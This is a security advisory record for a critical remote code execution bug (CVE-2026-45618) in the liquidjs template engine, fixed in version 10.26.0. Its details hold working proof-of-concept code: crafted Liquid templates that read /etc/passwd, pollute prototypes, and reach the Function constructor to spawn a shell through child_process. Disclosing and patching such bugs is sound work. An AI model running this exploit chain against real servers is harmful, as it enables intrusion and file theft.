{"id":"CVE-2026-45618","aliases":["GHSA-gf2q-c269-pqgc"],"url":"https://o3.security/vulnerability/CVE-2026-45618","summary":"LiquidJS is Vulnerable to Remote Code Execution","details":"### Summary\nIt is possible to execute arbitrary code with crafted templates\n\n\n### Details\n\n<details>\n<summary>\n `1|valueOf` -> `this` when evaluating the filter\n\n\n</summary>\n\n```liquid\n{%assign r=1|valueOf%}\n{{r|inspect}}\n```\n\n```json\n{\"context\":{\"scopes\":[{\"r\":\"[Circular]\"}],\"registers\":{},\"breakCalled\":false,\"continueCalled\":false,\"sync\":false,\"opts\":{\"root\":[\".\"],\"layouts\":[\".\"],\"partials\":[\".\"],\"relativeReference\":true,\"jekyllInclude\":false,\"keyValueSeparator\":\":\",\"extname\":\"\",\"fs\":{\"sep\":\"/\"},\"dynamicPartials\":true,\"jsTruthy\":false,\"dateFormat\":\"%A, %B %-e, %Y at %-l:%M %P %z\",\"locale\":\"en-US\",\"trimTagRight\":false,\"trimTagLeft\":false,\"trimOutputRight\":false,\"trimOutputLeft\":false,\"greedy\":true,\"tagDelimiterLeft\":\"{%\",\"tagDelimiterRight\":\"%}\",\"outputDelimiterLeft\":\"{{\",\"outputDelimiterRight\":\"}}\",\"preserveTimezones\":false,\"strictFilters\":false,\"strictVariables\":false,\"ownPropertyOnly\":true,\"lenientIf\":false,\"globals\":{},\"keepOutputType\":false,\"operators\":{},\"memoryLimit\":null,\"parseLimit\":null,\"renderLimit\":null},\"globals\":{},\"environments\":{},\"strictVariables\":false,\"ownPropertyOnly\":true,\"memoryLimit\":{\"base\":0,\"message\":\"memory alloc limit exceeded\",\"limit\":null},\"renderLimit\":{\"base\":0,\"message\":\"template render limit exceeded\",\"limit\":null}},\"token\":{\"kind\":32,\"input\":\"{%assign r=1|valueOf%}\\n{{r|inspect}}\",\"begin\":13,\"end\":20,\"name\":\"valueOf\",\"args\":[]},\"liquid\":{\"renderer\":{},\"filters\":{\"raw\":{\"raw\":true}},\"tags\":{},\"options\":{\"root\":[\".\"],\"layouts\":[\".\"],\"partials\":[\".\"],\"relativeReference\":true,\"jekyllInclude\":false,\"keyValueSeparator\":\":\",\"extname\":\"\",\"fs\":{\"sep\":\"/\"},\"dynamicPartials\":true,\"jsTruthy\":false,\"dateFormat\":\"%A, %B %-e, %Y at %-l:%M %P %z\",\"locale\":\"en-US\",\"trimTagRight\":false,\"trimTagLeft\":false,\"trimOutputRight\":false,\"trimOutputLeft\":false,\"greedy\":true,\"tagDelimiterLeft\":\"{%\",\"tagDelimiterRight\":\"%}\",\"outputDelimiterLeft\":\"{{\",\"outputDelimiterRight\":\"}}\",\"preserveTimezones\":false,\"strictFilters\":false,\"strictVariables\":false,\"ownPropertyOnly\":true,\"lenientIf\":false,\"globals\":{},\"keepOutputType\":false,\"operators\":{},\"memoryLimit\":null,\"parseLimit\":null,\"renderLimit\":null},\"parser\":{\"liquid\":\"[Circular]\",\"fs\":{\"sep\":\"/\"},\"loader\":{\"options\":{\"root\":[\".\"],\"layouts\":[\".\"],\"partials\":[\".\"],\"relativeReference\":true,\"jekyllInclude\":false,\"keyValueSeparator\":\":\",\"extname\":\"\",\"fs\":{\"sep\":\"/\"},\"dynamicPartials\":true,\"jsTruthy\":false,\"dateFormat\":\"%A, %B %-e, %Y at %-l:%M %P %z\",\"locale\":\"en-US\",\"trimTagRight\":false,\"trimTagLeft\":false,\"trimOutputRight\":false,\"trimOutputLeft\":false,\"greedy\":true,\"tagDelimiterLeft\":\"{%\",\"tagDelimiterRight\":\"%}\",\"outputDelimiterLeft\":\"{{\",\"outputDelimiterRight\":\"}}\",\"preserveTimezones\":false,\"strictFilters\":false,\"strictVariables\":false,\"ownPropertyOnly\":true,\"lenientIf\":false,\"globals\":{},\"keepOutputType\":false,\"operators\":{},\"memoryLimit\":null,\"parseLimit\":null,\"renderLimit\":null}},\"parseLimit\":{\"base\":0,\"message\":\"parse length limit exceeded\",\"limit\":null}}}}\n```\n\n</details>\n\n<details>\n<summary>\nfunction calls with a controlled first argument via comprable\n\n</summary>\n\n```js\nimport { Liquid } from \"liquidjs\";\n\nconst engine = new Liquid();\n\nconst storeFn = (dst, src) => {\n  const parts = src.split(\".\");\n  const path = parts.slice(0, -1).join(\".\");\n  const prop = parts.at(-1);\n\n  return `\n{% assign _g = ${path}|group_by:\"0\"%}\n{% assign _gs = _g | where:n,\"${prop}\"|first%}\n{% assign ${dst} = _gs.items | first | last %}`;\n};\n\nconst tpl = `\n{% liquid\nassign r = 1|valueOf\nassign m = r.context.scopes|first\nassign fs = r.liquid.options.fs\nassign n = \"name\"%}\n\n${storeFn(\"equals\", \"fs.readFileSync\")}\n${storeFn(\"gt\", \"fs.readFileSync\")}\n${storeFn(\"geq\", \"fs.readFileSync\")}\n${storeFn(\"lt\", \"fs.readFileSync\")}\n${storeFn(\"leq\", \"fs.readFileSync\")}\n\n{{m == \"/etc/passwd\"}}\n`;\n\nconst v = await engine.parseAndRender(tpl, {});\nconsole.log(v.trim());\n```\n\n<img width=\"1426\" height=\"717\" alt=\"image\" src=\"https://github.com/user-attachments/assets/0618eb81-fb0d-4100-a6a0-556982decf8a\" />\n\n</details>\n\n<details><summary>changing the prototype of things</summary>\n\n```js\nimport { Liquid } from \"liquidjs\";\n\nconst engine = new Liquid();\n\nengine.registerFilter(\"log\", (val) => console.dir(val, { depth: 1 }));\n\nconst tpl = `\n{% liquid\nassign r = 1|valueOf\nassign m = r.context.scopes|first %}\n\n{{m|log}}\n{% assign __proto__ = r.liquid.parser %}\n{{m|log}}\n`;\n\nconst v = await engine.parseAndRender(tpl, {});\nconsole.log(v.trim());\n```\n<img width=\"723\" height=\"211\" alt=\"image\" src=\"https://github.com/user-attachments/assets/c05f4c4a-4151-4765-b569-3300ad837668\" />\n\n</details> \n\nWhen calling functions via the comparable gadget, `this` will be the scope.\nBy overwriting `this.loader.lookup` and `this.readFile`, to fully control what goes into `this.parse`, and while controlling `this`, a reference to the `Function` constructor can be obtained, which then allows executing arbitrary code.\n\n```ts\n  private * _parseFile (file: string, sync?: boolean, type: LookupType = LookupType.Root, currentFile?: string): Generator<unknown, Template[], string> {\n    const filepath = yield this.loader.lookup(file, type, sync, currentFile)\n    return this.parse(yield this.readFile(!!sync, filepath), filepath)\n  }\n```\n\n### PoC\n_Complete instructions, including specific configuration details, to reproduce the vulnerability._\n\n```js\nimport { Liquid } from \"liquidjs\";\n\nconst engine = new Liquid();\n\nconst storeFn = (dst, src) => {\n  const parts = src.split(\".\");\n  const path = parts.slice(0, -1).join(\".\");\n  const prop = parts.at(-1);\n\n  return `\n{% assign _g = ${path}|group_by:\"0\"%}\n{% assign _gs = _g | where:n,\"${prop}\"|first%}\n{% assign ${dst} = _gs.items | first | last %}`;\n};\n\nconst tpl = `\n{% liquid\nassign r = 1|valueOf\nassign m = r.context.scopes|first\nassign l = r.liquid\nassign p = l.parser\nassign f = l.filters\nassign n = \"name\"%}\n\n${storeFn(\"equals\", \"p.parseFile\")}\n${storeFn(\"gt\", \"p.parseFile\")}\n${storeFn(\"geq\", \"p.parseFile\")}\n${storeFn(\"lt\", \"p.parseFile\")}\n${storeFn(\"leq\", \"p.parseFile\")}\n\n${storeFn(\"readFile\", \"f.default\")}\n${storeFn(\"lookup\", \"f.raw.handler\")}\n\n{% assign loader = m %}\n{% assign context = m %}\n{% assign opts = m %}\n{% assign liquid = m %}\n{% assign options = m %}\n{% assign __proto__ = p %}\n\n{% assign tagDelimiterLeft = n %}\n{% assign tagDelimiterRight = n %}\n{% assign outputDelimiterLeft = '[' %}\n{% assign outputDelimiterRight = ']'%}\n\n{# set to some some function, so that filters['constructor'] -> Function #}\n${storeFn(\"filters\", \"f.raw.handler\")} \n\n{# store Function #}\n{% assign output = m == \"[0|constructor]\" | first %}\n{% assign val = output.value.filters|first %}\n\n{# set scope.equals to Function #}\n${storeFn(\"equals\", \"val.handler\")}\n{% assign RCE = m == \"return process.getBuiltinModule('child_process').execSync('sh',{stdio:'inherit'})\" %}\n{{RCE}}\n`;\n\nconst v = await engine.parseAndRender(tpl, {});\nconsole.log(v.trim());\n```\n\n### Impact\n_What kind of vulnerability is it? Who is impacted?_\nRemote Code Execution.","published":"2026-08-11T19:27:09.777Z","modified":"2026-09-18T03:46:41.432224459Z","cvss":{"score":10,"severity":"CRITICAL","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},"epss":{"score":0.00925,"percentile":0.58769,"asOf":"2026-09-17"},"cisaKev":null,"exploitsKnown":0,"affectedPackages":[{"ecosystem":"npm","name":"liquidjs","fixedVersion":"10.26.0"}],"fix":null,"references":[{"type":"WEB","url":"https://github.com/harttle/liquidjs/releases/tag/v10.26.0"},{"type":"ADVISORY","url":"https://github.com/CVEProject/cvelistV5/tree/main/cves/2026/45xxx/CVE-2026-45618.json"},{"type":"ADVISORY","url":"https://github.com/harttle/liquidjs/security/advisories/GHSA-gf2q-c269-pqgc"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-45618"},{"type":"PACKAGE","url":"https://github.com/harttle/liquidjs"}],"provenance":{"sources":["OSV.dev","FIRST.org (EPSS)"],"lastVerified":"2026-09-18T03:46:41.432224459Z"}}